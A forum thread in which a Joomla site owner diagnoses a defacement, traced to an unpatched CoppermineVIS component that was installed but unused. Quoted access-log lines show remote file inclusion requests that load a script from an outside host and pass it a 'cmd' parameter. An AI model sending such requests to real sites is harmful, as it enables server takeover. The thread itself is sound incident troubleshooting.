My site was hacked, so that visitors would see a plain white screen with this text:

A1TS /home/clements Ownz /home/clements :: by Shaka

It appears that only the index.php file was over written. I could still access the back end and all the content was still there. As well, a second installation of Joomla (1.0.7) in a sub domain remained untouched.

Details:

Joomla 1.0.8
PHP 4.4.1
MySQL 4.1.14-standard-log
Apache 1.3.34 (Unix)

Site is hosted by http://www.bluehost.com and is shared hosting.

I have access to the “Raw Access Logs” through cpanel, but have trouble sorting through the text. (Is there some sort of application that organizes that data?)

I have the following components installed on the site: AKObook 3.42 with the hack to add the security codes; Coppermine 1.4.3; CoppermineVIS Premium 1.30; joomlaXplorer 1.3.2; mosCE 1.0.3; PU Arcade.

Hmm… I *did* have JCE editor installed, but it seems to have vanished.

I have the following mambots installed: MGM Image Gallery; Imbed PHP (kl_php);  the usual regular stuff.

My service provider told me this: My Fantastico control panel indicates I have Coppermine 1.3.4 and Joomla 1.0.3 installed. Those are the last versions I had installed via Fantastico before I started doing it myself. The tech support guy claimed that this is how the kiddie got in and told me to uninstall those old versions through Control Panel if I had manually installed newer versions myself. I am 99.999% sure that if I do that, I will be uninstalling my existing versions. He told me to do a full back up download, uninstall, then reinstall from the back up to clean it up, making the additional claim that I needed to do this because they probably got into my databases, too. Hmmm. Is this good advice?

Meanwhile, they did a restore and the site is back. I think if I just had a copy of the index.php file I could have uploaded it.

One more piece of information: I use .htaccess to protect the admin folder, so I have to login twice when accessing the backend, once to get through .htaccess, and once to get into Joomla.

The big question is: Where is the weak point that allowed this to happen?


Edit: title of post

Hackwar wrote:Have you read the sticky in this forum?

Yes. And I carefully gathered all the information requested. Did I miss something? I thought I was at this stage:

[quote=∓quot;Sticky Note"\]
I have checked all this, what can I do now?
Ok, you have collected all the files, you are sure that its Joomla and not your or your providers configuration that has caused the hacker to gain access to your server and you also have eliminated all third party extensions as source of the vulnerability. Now wrap all that information up in a nice mail and send it to security [at] joomla [dot] org. With this mailinglist you reach the developers and they will investigate this further.[/quote]

Obviously I can't really tell if it was a Bluehost vulnerability and I am trying to find out if the problem lies in my installation.

Was I not supposed to ask for help here?

There is possibly a security vulnerability within the CoppermineVIS component:
http://forum.joomla.org/index.php/topic,51714.0.html

This could have been the point of weakness, however you need to examine your access logs.

The (not so) funny thing is, I wasn't even using that component any more. But I guess it was there, published on my site.

I don't know enough about these access logs, but I think this stuff may be the culprit:

POST /index.php?option=com_copperminevis&Itemid=1&place=gallery&option=com_copperminevis&Itemid=1&place=http%3A%2F%2Fxpl.netmisphere2.com%2Ftool.txt%3F&&s=r& HTTP/1.1" 200 17497

GET /index.php?option=com_copperminevis&Itemid=1&place=http://xpl.netmisphere2.com/tool.txt?&&s=r&cmd= HTTP/1.1" 200 13383 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

etc. etc. etc.

CoppermineVIS is now uninstalled.

Thank you!!

Did you patched copperminevis? It was vuneralbe but is already fixed! You be aware and watch for probs with the software you're using.
Look on joombla.com copperminevis is safe now if you download the recent version!

Wil wrote:Did you patched copperminevis?

No, I wasn't even using it. After I started using it, there was something about it that I didn't like (can't remember now). Therefore, it was just sitting there being ignored.

What I have learned is that a component doesn't actually need to be in use to be vulnerable. I am going to uninstall all the other stuff that is sitting on my site not being used.